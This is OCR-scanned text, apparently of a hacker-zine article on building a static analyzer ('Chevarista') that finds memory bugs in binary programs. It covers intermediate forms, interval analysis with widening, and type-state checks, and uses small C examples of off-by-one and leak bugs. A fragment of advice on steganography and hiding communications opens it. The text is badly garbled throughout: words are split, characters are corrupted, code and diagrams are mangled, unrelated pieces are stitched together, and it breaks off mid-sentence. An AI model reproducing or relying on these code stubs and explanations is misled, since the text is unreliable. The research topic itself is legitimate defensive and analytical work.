hide your real communications. 


Steganography can be useful when combined with solid crypto. Encrypt and 
stego small messages into something like a full length movie avi, and 
distribute it to many people via a torrent. Only your intended recipient 
will have the key to decrypt the stegged message. Be sure to stego some 
purely random noise into other movies, and torrent them as well. 


Hopefully you’ll find this document useful as a starting point for 
further discussion and refinement. It’s not meant to be definitive, and 
is surely not comprehensive. Feel fr to copy, add, edit or change as 
you see fit. Please do add more relative to your area(s) of expertise. 
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Software have bugs. That is quite a known fact. 


[ I. Introduction 
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ulnerability analysis of binary programs. The source code of the 


8 
In this article, we will discuss the design of an engine for automated 
V 
Chevarista static analyzer is given at the end of this document. 


The purpose of this paper is not to disclose Oday vulnerability, but 
to understand how it is possible to find them without (or with 
restricted) human intervention. However, we will not friendly provide 
the result of our automated auditing on predefined binaries : instead 
W 
e 
u 
t 


e will always take generic examples of the most common difficulties 
ncountered when auditing such programs. Our goal is to enlight the 
nderground community about writing your own static analyzer and not 

o be profitful for security companies or any profit oriented organization. 


Instead of going straight to the results of the proposed implementation, 
we may introduce the domain of program analysis, without going deeply 
i 
fe) 


n the theory (which can go very formal), but taking the perspectiv 
f a hacker who is tired of focusing on a specific exploit problem 
and want to investigate until which automatic extend it is possible 
to find vulnerabilities and generate an exploit code for it without 
human intervention. 


Chevarista hasnt reached its goal of being this completely automated 

tool, however it shows the path to implement incrementally such tool 

with a genericity that makes it capable of finding any definable kind 
of vulnerability. 


Detecting all the vulnerabilities of a given program can be 

untractable, and this for many reasons. The first reason is that 

we cannot predict that a program running forever will ever have 

a bug or not. The second reason is that if this program ever stop, 

the number of states (as in "memory contexts") it reached and passed 
through before stopping is very big, and testing all of of possible 
concrete program paths would either take your whole life, or a dedicated 
big cluster of machine working on this for you during ages. 


As we need more automated systems to find bugs for us, and we do not 
have such computational power, we need to be clever on what has to be 
analysed, how generic can we reason about programs, so a single small 
analyzer can reason about a lot of different kinds of bugs. After all, 
if the effort is not worth the genericity, its probably better to audit 

code manually which would be more productive. However, automated systems 

are not limited to vulnerability findings, but because of their tight 

relation with the analyzed program, they can find the exact conditions 

in which that bug happens, and what is the context to reach for triggering it. 


But someone could interject me : "But is not Fuzzing supposed to do 
that already ?". My answer would be : Yes. But static analysis is 

the intelligence inside Fuzzing. Fuzzy testing programs give very 

good results but any good fuzzer need to be designed with major static 
analysis orientations. This article also applies somewhat to fuzzing 
but the proposed implementation of the Chevarista analyzer is not 

a fuzzer. The first reason is that Chevarista does not execute the 
program for analyzing it. Instead, it acts like a (de)compiler but 
perform analysis instead of translating (back) to assembly (or source) code. 
It is thus much more performant than fuzzing but require a lot of 
development and litterature review for managing to have a complete 
automatic tool that every hacker dream to maintain. 


Another lost guy will support : "Your stuff looks more or less like an 
exploitation framework, its not so new". Exploitation frameworks 

are indeed not very new stuffs. None of them analyze for vulnerabilities, 
and actually only works if the builtin exploits are good enough. When 
t 
a 
Cc 
a 


he framework aims at letting you trigger exploits manually, then it 

s not an automated framework anymore. This is why Chevarista is not 
ORE-Impact or Metasploit : its an analyzer that find bugs in programs 
nd tell you where they are. 


One more fat guy in the end of the room will be threatening: "It is simply 
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not possible to find vulnerabilities in code without the source .." and 
then a lot of people will stand up and declare this as a prophety, 
because its already sufficiently hard to do it on source code anyway. 

I would simply measure this judgement by several remarks: for some 


peoples, 


assembly code -is- source code, thus having the assembly is 


like having the source, without a certain number of information. That 
is this amount of lost information that we need to recover when writing 
a decompiler. 


First, we do not have the name of variables, but naming variables in a different 
way does not affect the result of a vulnerability analysis. Second, we do not have 
the types, but data types in compiled C programs do not really enforce properties 
about the variables values (because of C casts or a compiler lacking strong type 
checking). The only real information that is enforced is about variable size in 


memory, 


which is recoverable from an assembly program most of the time. This 


is not as true for C++ programs (or other programs written in higher level 


objects-oriented or functional languages), but in this article we will 
mostly focuss on compiled C programs. 


A widely spread opinion about program analysis is that its harder to 
acheive on a low-level (imperative) language rather than a high-level 
(imperative) language. This is true and false, we need to bring more 
precision about this statement. Specifically, we want to compare the 
analysis of C code and the analysis of assembly code: 


Available information C code Assembly code 
Original variables names Yes (explicit) No 
Original types names Yes (explicit) No 
Control Sequentiality Yes (explicit) Yes (explicit) 
Structured control Yes (explicit) Yes (recoverable) 
Data dependencies Yes (implicit) Yes (implicit) 
Data Types Yes (explicit) Yes (recoverable) 
Register transfers No Yes (explicit) 
Selected instructions No Yes (explicit) 


Lets discuss those points more in details: 


- The control sequentiality is obviously kept in the assembly, else 
the processor would not know how to execute the binary program. 
However the binary program does not contain a clearly structured 
tree of execution. Conditionals, but especially, Loops, do not appear 
as such in the executable code. We need a preliminary analysis for 
structuring the control flow graph. This was done already on source 
and binary code using different algorithms that we do not present 


in this article. 


—- Data dependencies are not explicit even in the source program, however 
we can compute it precisely both in the source code and the binary code. 
he dataflow analysis in the binary code however is slightly different, 
ecause it contains every single load and store between registers and 

he memory, not only at the level of variables, as done in the source 
rogram. Because of this, the assembly programs contains more instructions 
han source programs contain statements. This is an advantage anda 
isadvantage at the same time. It is an advantage because we can track 
he flow in a much more fine-grained fashion at the machine level, and 
hat is what is necessary especially for all kind of optimizations, 

or machine-specific bugs that relies on a certain variable being either 


ttadtobctowH 
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in the memory or in a register, etc. This is a disadvantage because we 
need more memory to analyse such bigger program listings. 


- Data types are explicit in the source program. Probably the recovery 
of types is the hardest information to recover from a binary code. 
However this has been done already and the approach we present in this 
paper is definitely compatible with existing work on type-based 
decompilation. Data types are much harder to recover when dealing with 
real objects (like classes in compiled C++ programs). We will not deal 
with the problem of recovering object classes in this article, as we 
focuss on memory related vulnerabilities. 


Register level anomalies can happen [DLB], which can be useful for a 
hacker to determine how to create a context of registers or memory when 
writing exploits. Binary-level code analysis has this advantage that it 
provides a tighter approach to exploit generation on real world existing 
targets. 


- Instruction level information is interested again to make sure we dont 
miss bugs from the compiler itself. Its very academically well respected 
to code a certified compiler which prove the semantic equivalence between 
source code and compiled code but for the hacker point of view, it does 
not mean so much. Concrete use in the wild means concrete code, 

means assembly. Additionally, it is rarer but it has been witnessed 
already some irregularities in the processor’s execution of specific 
patterns of instructions, so an instruction level analyzer can deal with 
those, but a source level analyzer cannot. A last reason I would mention 
is that the source code of a project is very verbose. If a code analyzer 
is embedded into some important device, ither the source code of the 
software inside the device will not be available, or the device will lack 
storage or communication bandwidth to keep an accessible copy of the source 
code. Binary code analyzer do not have this dependencie on source code and 
can thus be used in a wider scope. 


To sum-up, there is a lot of information recovery work before starting to 
perform the source-like level analysis. However, the only information 
that is not available after recovery is not mandatory for analysing 

code : the name of types and variables is not affecting the 

execution of a program. We will abstract those away from our analysis 

and use our own naming scheme, as presented in the next chapter of this 
article. 


[ II. Preparation 


We have to go on the first wishes and try to understand better what 
vulnerabilities are, how we can detect them automatically, are we 
really capable to generat xploits from analyzing a program that we 
do not even execute ? The answer is yes and no and we need to make 
things clear about this. The answer is yes, because if you know exactly 
how to caracterize a bug, and if this bug is detectable by any 
algorithm, then we can code a program that will reason only about 
those known-in-advance vulnerability specificities and convert the 

raw assembly (or source) code into an intermediate form that will make 
clear where the specificities happens, so that the "Signature" of the 
vulnerability can be found if it is present in the program. The answer 
is no, because giving an unknown vulnerability, we do not know in 
advance about its specificities that caracterize its signature. It 
means that we somewhat have to take an approximative signature and 
check the program, but the result might be an over-approximation (a 
lot of false positives) or an under-approximation (finds nothing or 
few but vulnerabilities exist without being detected). 
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As fuzzing and black-box testing are dynamic analysis, the core of 

our analyzer is not as such, but it can find an interest to run the 
program for a different purpose than a fuzzer. Those try their 

chance on a randomly crafted input. Fuzzer does not have a *inner* 
knowledge of the program they analyze. This is a major issue because 

the dynamic analyzer that is a fuzzer cannot optimize or refine 

its inputs depending on what are unobservable events for him. A fuzzer 
can as well be coupled with a tracer [AD] or a debugger, so that fuzzing 
is guided by the debugger knowledge about internal memory states and 
variable values during the execution of the program. 


Nevertheless, the real concept of a code analysis tool must be an integrated 
solution, to avoid losing even more performance when using an external 
debugger (like gdb which is awfully slow when using ptrace). Our 

technique of analysis is capable of taking decisions depending on 

internal states of a program even without executing them. However, our 
representation of a state is abstract : we do not compute the whole 

content of the real memory state at each step of execution, but consider 
only the meaningful information about the behavior of the program by automatically 
letting the analyzer to annotate the code with qualifiers such as : "The next 
instruction of the will perform a memory allocation" or "Register R or memory cell 
M 

a 

p 


will contain a pointer on a dynamically allocated memory region". We will explain 
n more details heap related properties checking in the type-state analysis 
aragraph of Part III. 


In this part of the paper, we will describe a family of intermediate forms 
which bridge the gap between code analysis on a structured code, and code 
analysis on an unstructured (assembly) code. Conversion to those intermediat 
forms can be done from binary code (like in an analyzing decompiler) or from 
source code (like in an analyzing compiler). In this article, we will 
transform binary code into a program written in an intermediate form, and then 
perform all the analysis on this intermediate form. All the studies properties 
will be related to dataflow analysis. No structured control flow is necessary 
to perform those, a simple control flow graph (or even list of basic blocks 
with xrefs) can be the starting point of such analysis. 


Lets be more concrete a illustrate how we can analyze the internal states of 
a program without executing it. We start with a very basic piece of code: 


Stub 1 
fe) o 3: internal state 
if (a) / \ 
bt++; ae ° ° /\ : control-flow splitting 
else \ / \/ +: control-flow merging 
Cnty ° 


In this simplistic example, we represent the program as a graph whoose 

nodes are states and edges are control flow dependencies. What is an internal 
state ? If we want to use all the information of each line of code, 

we need to make it an object remembering which variables are used and modified 
(including status flags of the processors). Then, each of those control state 
perform certains operations before jumping on another part of the code (represented 
by the internal state for the if() or else() code stubs). Once the if/els 

code is finished, both paths merge into a unique state, which is the state after 
having executed the conditional statement. Depending how abstract is the analysis, 
the internal program states will track more or less requested information at each 
computation step. For example, once must differentiate a control-flow analysis 
(like in the previous example), and a dataflow analysis. 


Imagine this piece of code: 


Stub:.2% 
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Code Control-flow Data-flow with predicates 
a 
BGs 
/ ae 
/ Ne oN 
fe 3G \ \ 
c vale fe) | fe) base. \ 
b = a; | [il ee / \ 
a= 42; fe) VA esses / 
if. (bi Lee) / \ /\ |b t= cl / 
att; o 00 Ie Ng ee i 
else \ / / \ / \ / 
a-~; e) | ao ao 
c += a; | \ | / 
SeSe Ss Oo \ | / 
\ | / 
\ | 
ome) 
| 


ma 
~~ 


In a dataflow graph, the nodes are the variables, and the arrow are the 
dependences between variables. The control-flow and data-flow graphs are 
actually complementary informations. One only cares about the sequentiality 
in the graph, the other one care about the dependences between the variables 
without apparently enforcing any order of evaluation. Adding predicates 

to a dataflow graph helps at determining which nodes are involved in a 
condition and which instance of the successors data nodes (in our case, 
variable a in the if() or the else()) should be considered for our 

analysis. 


As you can see, even a simple data-flow graph with only few variables 

starts to get messy already. To clarify the reprensentation of the 

program we are working on, we need some kind of intermediate representation 
that keep the sequentiality of the control-flow graph, but also provide the 
dependences of the data-flow graph, so we can reason on both of them 

using a single structure. We can use some kind of "program dependence graph" 
that would sum it up both in a single graph. That is the graph we will consider 
for the next examples of the article. 


Some intermediate forms introduces special nodes in the data-flow graph, and 

give a well-recognizable types to those nodes. This is the case of Phi() and 

Sigma() nodes in the Static Single Assignment [SSA] and Static Single 

Information [SSI] intermediate forms and that facilitates indeed the reasoning 

on the data-flow graph. Additionally, decomposing a single variable into 

multiple "single assignments" (and multiple single use too, in the SSI form), 

that is naming uniquely each apparition of a given variable, help at desambiguizing 
which instance of the variable we are talking about at a given point of the program: 


Stub 2 in SSA form Stub 2 in SSI form Data-flow graph in SSI form 
él a21; cl = 21; o al 
bl = al; bl = al; / \ 
af (ds he cea) (a3, a4) = Sigma(a2); (a3, a4) = Sigma(a2) o o bl 
a2 =al +1; if (bl != cl) / | 
else a3 = a2 +1; / | 
/ | 
/ | 
/ | o cl 
ase ad ss des else | | 
a4 = Phi(a2, a3) a4 =a2 - 1; a3 0 o a4 | 
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c2 = cl + a4; a5 = Phi(a3, a4); \ 
c2 = cl + a5; \ 


| 
| 
| 
| 
a5 = Phi(a3, a4) fe) 


Note that we have not put the predicates (condition test) in that graph. In 
practice, its more convenient to have additional links in the graph, for 
predicates (that ease the testing of the predicate when walking on the graph), 
but we have removed it just for clarifying what is SSA/SSI about. 


Those "symbolic-choice functions" Phi() and Sigma() might sound a little bit 
abstract. Indeed, they dont change the meaning of a program, but they capture 
the information that a given data node has multiple successors (Sigma) or 
ancestors (Phi). The curious reader is invited to look at the references for 
more details about how to perform the intermediate translation. We will here 
focuss on the use of such representation, especially when analyzing code 

with loops, like this one: 


Stub 3 C code Stub 3 in Labelled SSI form 

int a = 42; int al = 42; 

int i = 0; int il = 0; 
Pl = [il < al] 
(<i4:Loop>, <i9:End>) = Sigma(P1,i2); 
(<a4:Loop>, <a9:End>) = Sigma(P1,a2); 


while (i < a) 

{ => Loop: 
a3 = Phi(<BLoop:al>, <BEnd:a5>); 
13 = Phi(<BLoop:il>, <BEnd:i5>); 


a--; a5 = a4 - 1; 
it+; i5 = i4 + 1; 
P2 = [i5 < a5] 
(<a4:Loop>, <a9:End>) = Sigma(P2,a6); 
(<i4:Loop>, <i9:End>) = Sigma(P2,1i6); 
} 
End: 
a8 = Phi(<BLoop:al>, <Bend:a5>); 
18 = Phi(<BLoop:il>, <Bend:i5>); 
a += i; al0 = a9 + i9; 


By trying to synthetize this form a bit more (grouping the variables 

under a unique Phi() or Sigma() at merge or split points of the control 
flow graph), we obtain a smaller but identical program. This time, 

the Sigma and Phi functions do not take a single variable list in parameter, 
but a vector of list (one list per variable): 


Stub 3 in Factored & Labelled SSI form 


He Bp: 
535 
ct oct 
H: © 
RR 
ot 
Ow 
~ Dh 
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(<i4:Loop>, <i9:End>) (i2) 
( ) = Sigma(Pl,( )); 
(<a4:Loop>, <a9:End>) (a2) 
Loop: 
(a3) (<BLoop:al>, <BEnd:a5>) 
( 2y-= Phe ¢ i 
(13) (<BLoop:il>, <BEnd:i5>) 
a5 a4 - 1; 
i5 = i4 + 1; 
P2 = [i5 < a5] 
(<a4:Loop>, <a9:End>) (a6) 
( ) = Sigma(P2, ( )); 
(<i4:Loop>, <i9:End>) (16) 
End: 
(a8) (<BLoop:al>, <Bend:a5>) 
( op] "Print i 
(18) (<BLoop:il>, <Bend:i5>) 
al0 = a9 + i9; 


How can we add information to this intermediate form ? Now the Phi () 
functions allows us to reason about forward dataflow 
(in the normal execution order, 


and Sigma () 


analysis 


Lets consider the Sigma () 


arguments: 


We take _|_ 


(in th 
inductive variables 


Eevers 


order, 


before 


using Sigma) 
using Phi). 


(variables that depends on themselves, 
index or incrementing pointers in a loop), 


each Label, 


and backward dataflow 
We can easily find the 
like the 


just using a simple analysis: 


and try to iterate its 


(<a4:Loop>, <a9:End>) (a6) 

( ) = Sigma(P2, ( )); 
(<i4:Loop>, <i9:End>) (16) 
(<a5:Loop>, <al0:End>) 

( ) 

(<i5:Loop>, ot ee ) 

(<a6:Loop>, ate ) 

( ) 

(<i6:Loop>, eet) ) 

("bottom") as a notation to say that a variable 


does not have any more successors after a certain iteration 


of the Sigma () 


After some 


function 


iterations 


(in that example, 


2), 


we notice that 


the left-hand side and the right-hand side are identical 


for variables a andi. 


a6 and i6. 


In the mathematical jargon, 


Indeed, both side are written given 


that 


is what is called 
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a fixpoint (of a function F) 


or in this precis xampl 
a6 = Sigma(aé) 


By doing that simple iteration-based analysis over our 

symbolic functions, we are capable to deduce in an automated 

way which variables are inductives in loops. In our example, 

both a and i are inductive. This is very useful as you can imagine, 
since those variables become of special interest for us, especially 
when looking for buffer overflows that might happen on buffers in 

looping code. 


We will now somewhat specialize this analysis in the following 
part of this article, by showing how this representation can 


apply to 


[ III. Analysis 


The previous part of the article introduced various notions 
in program analysis. We might not use all the formalism in the future 
of this article, and focuss on concrete examples. However, keep in 
mind that we reason from now for analysis on the intermediate form 
programs. This intermediate form is suitable for both source code 
and binary code, but we will keep on staying at binary level for our 
examples, proposing the translation to C only for understanding 
purposes. Until now, we have shown our to understand data-flow analysis 
and finding inductive variables from the (source or binary) code of 
the program. 


So what are the steps to find vulnerabilities now ? 


A first intuition is that there is no generic definition for a 
vulnerability. But if we can describes them as behavior that 

violates a certain precise property, we are able to state if a 
program has a vulnerability or not. Generally, the property depends 
on the class of bugs you want to analyse. For instance, properties 
that express buffer overflow safety or property that express a heap 
corruption (say, a double free) are different ones. In the first case, 
we talk about the indexation of a certain memory zone which has to never 
go further the limit of the allocated memory. Additionally, for 
having an overflow, this must be a write access. In case we have a 
read access, we could refer this as an info-leak bug, which 

may be blindly or unblindly used by an attacker, depending if the 
result of the memory read can be inspected from outside the process 
or not. Sometimes a read-only out of bound access can also be used 

to access a part of the code that is not supposed to be executed 

in such context (if the out-of-bound access is used in a predicate). 
In all cases, its interesting anyway to get the information by our 
analyzer of this unsupposed behavior, because this might lead to a 
wrong behavior, and thus, a bug. 


In this part of the article, we will look at different class of 
bugs, and understand how we can caracterize them, by running very 
simple and repetitive, easy to implement, algorithm. This algorithm 
is simple only because we act on an intermediate form that already 
indicates the meaningful dataflow and controlflow facts of the 
program. Additionally, we will reason either forward or backward, 
depending on what is the most adapted to the vulnerability. 


We will start by an example of numerical interval analysis and show 
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how it can be useful to detect buffer overflows. We will then show 

how the dataflow graph without any value information can be useful 

for finding problems happening on the heap. We will enrich our 
presentation by describing a very classic problem in program analysis, 
which is the discovery of equivalence between pointers (do they point 
always on the same variable ? sometimes only ? never ?), also known as 
alias analysis. We will explain why this analysis is mandatory for any 
serious analyzer that acts on real-world programs. Finally, we will 
give some more hints about analyzing concurrency properties inside 
multithread code, trying to caracterize what is a race condition. 


+ SSS SSeS [ A. Numerical intervals 


When looking for buffer overflows or integer overflows, the 
mattering information is about the values that can be taken by 
memory indexes or integer variables, which is a numerical value. 


Obviously, it would not be serious to compute every single possible 

value for all variables of the program, at each program path : this 

would take too much time to compute and/or too much memory for the values 
graph to get mapped entirely. 


By using certain abstractions like intervals, we can represent the set 

of all possible values of a program a certain point of the program. We 
will illustrate this by an example right now. Th xample itself is 
meaningless, but the interesting point is to understand the mecanized 

way of deducing information using the dataflow information of the program 
graph. 


We need to start by a very introductionary example, which consists of 
finding 


Stub 4 Interval analysis of stub 4 


b= "0+ b = [0 to 0] 
if (rand() ) 

be=; b= [-1l to. =] 
else 

bt++; b = [1 to 1] 


After if/else: 


b= [otter] 


a = 1000000 / b; a [1000000 / -1 to 1000000 / 1] 


[Reported Error: b can be 0] 


In this example, a flow-insensitive analyzer will merge the interval of v 
at each program control flow merge. This is a seducing approach as you ne 
pass a Single time on the whole program to compute all intervals. However 
approach is untractable most of the time. Why ? In this simpl xample, t 


alues 
ed to 
_eALs 
h 


flow-insensitive analyzer will report a bug of potential division by 0, w 
it is untrue that b can reach the value 0 at the division program point. 

is because 0 is in the interval [-1 to 1] that this false positive is rep 
by the analyzer. How can we avoid this kind of over-conservative analysis 


We need to introduce some flow-sensitiveness to the analysis, and differe 


hereas 

This 

orted 
? 


ntiate 
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the interval for different program path of the program. If we do a complete flow 
sensitive analysis of this example, we hav 


Stub 4 Interval analysis of stub 4 


b = 0; i 7= LO stor-O:] 
if (rand() ) 

b--; b = [-1 to -1] 
else 

b++; b = [1 to 1] 


After if/else: 
b = [-1 to -1 OR 1 to 1] 


a = 1000000 / b; a 


[1000000 / -1 to 1000000 / -1] or 
[1000000 / 1 to 1000000 / 1] 
{-1000000 or 1000000} 


Then the false positive disapears. We may take care of avoiding to be flow sensitive 

from the beginning. Indeed, if the flow-insensitive analysis gives no bug, then no 

bugs will be reported by the flow-sensitive analysis either (at least for this example). 
Additionally, computing the whole flow sensitive sets of intervals at some program point 
will grow exponentially in the number of data flow merging point (that is, Phi() function 
of the SSA form). 


For this reason, the best approach seems to start with a completely flow insensitive, 
and refine the analysis on demand. If the program is transforted into SSI form, then 
it becomes pretty easy to know which source intervals we need to use to compute the 
destination variable interval of values. We will use the same kind of analysis for 
detecting buffer overflows, in that case the interval analysis will be used on the 
index variables that are used for accessing memory at a certain offset from a given 
base address. 


Before doing this, we might want to do a remark on the choice of an interval abstraction 
itself. This abstraction does not work well when bit swapping is involved into the 
operations. Indeed, the intervals will generally have meaningless values when bits are 
moved inside the variable. If a cryptographic operation used bit shift that introduces 0 
for replacing shifted bits, that would not be a a problem, but swapping bits inside a given 


word is a problem, since the output interval is then meaningless. 


ex: 
c=al|b (with A, B, and C integers) 
c=a*b 
c = not (c) 


Giving the interval of A and B, what can we deduce for the intervals of C ? Its less trivia 
1 
than a simple numerical change in the variable. Interval analysis is not very well adapted 
for analyzing this kind of code, mostly found in cryptographic routines. 


We will now analyze an example that involves a buffer overflow on the heap. Befor 
doing the interval analysis, we will do a first pass to inform us about the statement 
related to memory allocation and disallocation. Knowing where memory is allocated 
and disallocated is a pre-requirement for any further bound checking analysis. 


Stub 5 Interval analysis with alloc annotations 
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char *buf; buf = _|_ (uninitialized) 
int n = rand(); n = [-Inf, +Inf] 
buf = malloc(n) buf = initialized of size [-Inf to Inf] 
i = 0; i = [0,-0.5 (0544. 23 fO,Ni] 
while (i <= n) 
{ 

assert(i < N) 

buf[i] = 0x00; 

PER i = (0; 15." FOg 2). oes [05Ni) 

(iterl iter2 ... iterN) 

} 
return (i); 
Lets first explain that the assert() is a logical representation in the intermediat 
form, and is not an assert() like in C program. Again, we never do any dynamic analysis 


but only static analysis without any execution. In the static analysis of the intermediat 
form program, a some point the control flow will reach a node containing the assert stateme 
nt. 

In the intermediate (abstract) word, reaching an assert() means performing a check on the 
abstract value of the predicate inside the assert (i < N). In other words, the analyzer 
will check if the assert can be false using interval analysis of variables, and will print 
a bug report if it can. We can also let the assert() implicits, but representing them 
explicitely make the analysis more generic, modular, and adaptable to the user. 


As you can see, there is a one-byte-overflow in this example. It is pretty trivial 

to spot it manually, however we want to develop an automatic routine for doing 

it. If we deploy the analysis that we have done in the previous example, the assert () 

that was automatically inserted by the analyzer after each memory access of the program 
will fail after N iterations. This is because arrays in the C language start with index 0 a 
nd 
finish with an index inferior of 1 to their allocated size. Whatever kind of 

code will be inserted between those lines (except, of course, bit swapping as 
previously mentioned), we will always be able to propagate the intervals and find 
that memory access are done beyond the allocated limit, then finding a clear 
memory leak or memory overwrite vulnerability in the program. 


However, this specific example brings 2 more questions: 


—- We do not know the actual value of N. Is it a problem ? If we 
manage to see that the constraint over the index of buf is actually 
the same variable (or have the same value than) the size of the 
allocated buffer, then it is not a problem. We will develop this in 
the alias analysis part of this article when this appears to be a 
difficulty. 


Whatever the value of N, and provided we managed to identify N 

all definitions and use of the variable N, the analyzer will require N 
iteration over the loop to detect the vulnerability. This is not 
acceptable, especially if N is very big, which in that case many 
minuts will be necessary for analysing this loop, when we actually 
want an answer in the next seconds. 


The answer for this optimization problem is a technique called Widening, gathered 
from the theory of abstract interpretation. Instead of executing the loop N 

times until the loop condition is false, we will directly in 1 iteration go to 
the last possible value in a certain interval, and this as soon as we detect a 
monotonic increase of the interval. The previous example would then compute 


like in: 

Stub 5 Interval analysis with Widening 
Ghar. *but; buf = _|_ (uninitialized) 

int n = rand(); n = [-Inf, +Inf] 


buf = malloc(n) buf = initialized of size [-Inf to Inf] 
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while (i <= n) 


{ 


assert(i < N); iterl iter2 iter3 iter4 ASSERT! 
buf[i] = 0x00; i = [0,0], [0,1] [0,2] [0,N] 
itt; i = [0,1], [0,2] [0,3] [0,N] 


} 


return (i); 


Using this test, we can directly go to the biggest possible interval in only 
a few iterations, thus reducing drastically the requested time for finding 
the vulnerability. However this optimization might introduce additional 
difficulties when conditional statement is inside the loop: 


Stub 6 Interval analysis with Widening 
char *buf; buf = _|_ (uninitialized) 
int n = rand() + 2; n = [-Inf, +Inf] 
buf = malloc(n) buf = initialized of size [-Inf to Inf] 
i = 0; i = [0,0] 
while (i <= n) i = [0,0] [0,1] [0,2] [0,N] [0,N+1] 
{ 
ist Gis <A 2) i = <same than previously for all iterations> 
{ 
assert(i < N - 1) [Never triggered !] 
buf[i] = 0x00; i = [0,0] [0,1] [0,2] [0,N] <False positive> 
} 
i++; i = [0,1] [0,2] [0,3] [0,N] [0,N+1] 


} 


return (i); 


In this example, we cannot assume that the interval of i will be the sam verywher 
in the loop (as we might be tempted to do as a first hint for handling intervals in 
a loop). Indeed, in the middle of the loop stands a condition (with predicate being 
i <n - 2) which forbids the interval to grow in some part of the code. This is problematic 


especially if we decide to use widening until the loop breaking condition. We will miss 

this more subtle repartition of values in the variables of the loop. The solution for this 
is to use widening with thresholds. Instead of applying widening in a single time over th 
entire loop, we will define a sequel of values which corresponds to "Strategic points" of 
the code, so that we can decide to increase precisely using a small-step values iteration. 


The strategic points can be the list of values on which a condition is applied. In our case 
we would apply widening until n = N - 2 and not until n =N. This way, we will not trigger 


a false positive anymore because of an overapproximation of the intervals over th nore 
loop. When each step is realized, that allows to annotate which program location is the sub 
ject 


of the widening in the future (in our case: the loop code before and after the "if" stateme 
nt). 


Note that, when we reach a threshold during widening, we might need to apply a small-step 
iteration more than once before widening again until the next threshold. For instance, 

when predicates such as (a != immed_value) are met, they will forbid the inner code of 

the condition to have their interval propagated. However, they will forbid this just one 
iteration (provided a is an inductive variable, so its state will change at next iteration) 


or multiple iterations (if a is not an inductive variable and will be modified only at anot 
her 
moment in the loop iterative abstract execution). In the first case, we need only 2 small-s 
tep 


abstract iterations to find out that the interval continues to grow after a certain iterati 
on. 
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In the second case, we will need multiple iteration until some condition inside the loop is 


reached. We then simply needs to make sure that the threshold list includes the variable va 
lue 

used at this predicate (which heads the code where the variable a will change). This way, w 
e 


can apply only 2 small-step iterations between those "bounded widening" steps, and avoid 
generating false positives using a very optimized but precise abstract evaluation sequence. 


In our example, we took only an easy example: the threshold list is only made of 2 elements 


(n 


and (n - 2)). 


But what if a condition is realized using 2 variables and not a variable and 


an immediate value ? in that case we have 3 cases: 


CASE1 — The 
© variables 


2 variables are inductive variables: in that case, the threshold list of the tw 


must be fused, so widening do not step over a condition that would make it lose precision. 


This 
seem to be a reasonable condition when one variable is the subject of a constraint that inv 
olve 
a constant and the second variable is the subject of a constraint that involve the first va 
riable: 
Stub 7 Threshold discovery 
int a = MIN_LOWERBOUND; 
int b = MAX_UPPERBOUND; 
int i = 0; 
int n = MAXSIZE; 
while (i < n) Found threshold n 
{ 
if (a <i <b) Found predicate involving a and b 
Genie) 
if (a > sizeof (something) ) Found threshold for a 
i= b; 
else if (b + 1 < sizeof (buffer) ) Found threshold for b 
i =a; 


In that case, we can define the threshold of this loop being a list of 2 values, 
one being sizeof(something), the other one being sizeof (buffer) or sizeof (buffer) - 1 


in case the 


analyzer is a bit more clever (and if the assembly code makes it clear 


that the condition applyes on sizeof (buffer) - 1). 


CASE2 —- One 


of the variable is inductive and the other one is not. 


So we have 2 subcases: 


-— The inductive variable is involved in a predicate that leads to modification 
of the non-inductive variable. It is not possible without the 2 variables 
being inductives !Thus we fall into the case 1 again. 


— The non-inductive variable is involved in a predicate that leads to 
modification of the inductive variable. In that case, the non-inductive 
variable would be invariant over the loop, which mean that a test between 


its domain of values (its interval) and the domain of the inductive 


variable 


is required as a condition to enter the code stubs headed by the 


analyzed predicate. Again, we have 2 sub-subcases: 


* Either the predicate is a test == or !=. In that case, we must compute 


the 


intesection of both variables intervals. If the intersection is void, 
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the test will never true, so its dead code. If the intersection is itself 

an interval (which will be the case most of the time), it means that the 

test will be true over this inductive variable intervals of value, and 

false over the remaining domain of values. In that case, we need to put 

the bounds of the non-inductive variable interval into the threshold list for 
the widening of inductive variables that depends on this non-inductive 


variable. 
* Or the predicate is a comparison : a < b (where a or b is an inductive 
variable). Same remarks holds : we compute the intersection interval 


between a and b. If it is void, the test will always be true or false and 

we know this before entering the loop. If the interval is not void, we 

need to put the bounds of the intersection interval in the widening threshold 
of the inductive variable. 


CASE3 —- None of the variables are inductive variables 


In that case, the predicate that they define has a single value over th 
entire loop, and can be computed before the loop takes place. We then can 
turn the conditional code into an unconditional one and apply widening 
like if the condition was not existing. Or if the condition is always 
false, we would simply remove this code from the loop as the content of 
the conditional statement will never be reached. 


As you can see, we need to be very careful in how we perform the widening. If 
the widening is done without thresholds, the abstract numerical values will 

be overapproximative, and our analysis will generate a lot of false positives. 
By introducing thresholds, we sacrify very few performance and gain a lot of 
precision over the looping code analysis. Widening is a convergence accelerator 
for detecting problems like buffer overflow. Some overflow problem can happen 
after millions of loop iteration and widening brings a nice solution for 
getting immediate answers even on those constructs. 


I have not detailed how to find the size of buffers in this paragraph. Wether 
the buffers are stack or heap allocated, they need to have a fixed size at 
some point and the stack pointer must be substracted somewhere (or malloc 
needs to be called, etc) which gives us the information of allocation 
alltogether with its size, from which we can apply our analysis. 


We will now switch to the last big part of this article, by explaining how 
to check for another class of vulnerability. 


Tah ees Sa [ B. Type state checking (aka double free, memory leaks, etc) 


There are some other types of vulnerabilities that are slightly different to 
check. In the previous part we explained how to reason about intervals of 
values to find buffer overflows in program. We presented an optimization 
technique called Widening and we have studied how to weaken it for gaining 
precision, by generating a threshold list from a set of predicates. Note that 
we havent explicitely used what is called the "predicate abstraction", which 
may lead to improving the efficiency of the analysis again. The interested 
reader will for sure find resources about predicate abstraction on any good 
research oriented search engine. Again, this article is not intended to give 
all solutions of the problem of the world, but introduce the novice hacker 
to the concrete problematic of program analysis. 


In this part of the article, we will study how to detect memory leaks and 

heap corruptions. The basic technique to find them is not linked with interval 
analysis, but interval analysis can be used to make type state checking more 
accurate (reducing the number of false positives). 
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Lets take an example of memory leak to be concrete: 
Stub 8 

Wy Wink vebt =) 0; 

2. u_int ret = MAXBUF; 


3. char *buf malloc(ret); 


4 

5 ff += read(sock, buf + off, 
6. if (off == 0) 
7. return (-ERR); 
8 

9 

1 


else if (ret == off) 
buf = realloc(buf, 


: ret 4)2)% 
O0.} while (ret); 


printf ("Received %s \n", 
free (buf); 
return; 


buf); 


In that case, 
is returned without freeing the buffer. 


ret 


- off); 


there is no overflow but if some condition appears after the read, 
This is not a vulnerability as it, 


an error 
but it can 


